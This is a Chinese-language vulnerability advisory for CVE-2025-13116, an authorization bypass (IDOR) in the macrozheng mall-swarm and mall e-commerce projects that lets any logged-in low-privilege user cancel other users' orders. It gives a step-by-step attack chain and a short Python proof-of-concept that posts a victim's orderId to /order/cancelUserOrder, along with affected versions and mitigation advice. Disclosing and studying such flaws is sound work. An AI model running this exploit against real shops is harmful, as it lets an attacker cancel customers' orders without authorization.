CVE-2025-13116 CVSS 5.4 中危

CVE-2025-13116: mall-swarm/mall订单取消接口授权绕过漏洞

披露日期: 2025-11-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13116

漏洞类型

授权绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

macrozheng mall-swarm, mall

漏洞概述

macrozheng mall-swarm和mall项目存在授权绕过漏洞，攻击者可以利用/order/cancelUserOrder接口，在低权限用户身份下，通过操纵orderId参数取消任意用户的订单。该漏洞影响版本至1.0.3，CVSS评分5.4，属于中危级别。漏洞源于接口未正确验证当前用户与目标订单的所有权关系，导致任何经过认证的低权限用户都能执行订单取消操作。此漏洞已被公开披露并可能有利用代码流传，建议尽快采取修复措施。

技术细节

漏洞位于mall-swarm和mall项目的/order/cancelUserOrder接口的cancelUserOrder函数中。该接口在处理用户订单取消请求时，未对当前登录用户与orderId参数对应的订单进行所有权校验。攻击者只需获取或猜测有效的orderId，即可通过低权限账户发送请求取消他人订单。攻击过程无需特殊权限或用户交互，可远程利用。漏洞属于OWASP Top 10中的Broken Access Control类别，具体为IDOR（Insecure Direct Object References）变种。修复需要在接口中添加用户身份和订单所有权验证逻辑，确保只有订单所有者才能取消自己的订单。

攻击链分析

STEP 1

信息收集

攻击者首先注册一个低权限账户并登录系统，获取有效的会话token

STEP 2

目标侦察

通过合法功能或API接口获取系统中其他用户的有效订单ID（orderId）

STEP 3

构造请求

使用获取的低权限会话，向/order/cancelUserOrder接口发送POST请求，在orderId参数中填入目标用户的订单ID

STEP 4

权限绕过

服务端未验证当前用户与目标订单的归属关系，直接执行订单取消操作

STEP 5

订单取消

目标用户的订单被成功取消，攻击者完成未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13116 PoC - mall-swarm/mall Unauthorized Order Cancellation
# Target: /order/cancelUserOrder endpoint

target_url = "http://target-server/api/order/cancelUserOrder"

# Attacker obtains a valid low-privilege session
session = requests.Session()
# Login with low-privilege account
session.post("http://target-server/api/user/login", json={
    "username": "attacker",
    "password": "password123"
})

# Exploit: Cancel another user's order by manipulating orderId parameter
# Replace ORDER_ID with target victim's order ID
malicious_payload = {
    "orderId": "VICTIM_ORDER_ID"  # Any valid orderId can be used
}

response = session.post(target_url, json=malicious_payload)

if response.status_code == 200:
    print("[+] Order cancelled successfully - Authorization bypass confirmed")
else:
    print("[-] Exploit failed")

影响范围

macrozheng mall-swarm <= 1.0.3

macrozheng mall <= 1.0.3

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙（WAF）或API网关层添加规则，限制/order/cancelUserOrder接口的访问频率，并对异常订单取消行为进行监控告警。同时检查订单取消日志，排查是否存在已发生的未授权取消操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13116
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13116
3 Details https://www.cvedetails.com/cve/CVE-2025-13116/
4 VulDB https://vuldb.com/cve/CVE-2025-13116
5 Link https://github.com/Hwwg/cve/issues/13
6 Link https://github.com/Hwwg/cve/issues/8
7 Link https://vuldb.com/?ctiid.332321
8 Link https://vuldb.com/?id.332321
9 Link https://vuldb.com/?submit.683339
10 Link https://vuldb.com/?submit.686530

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表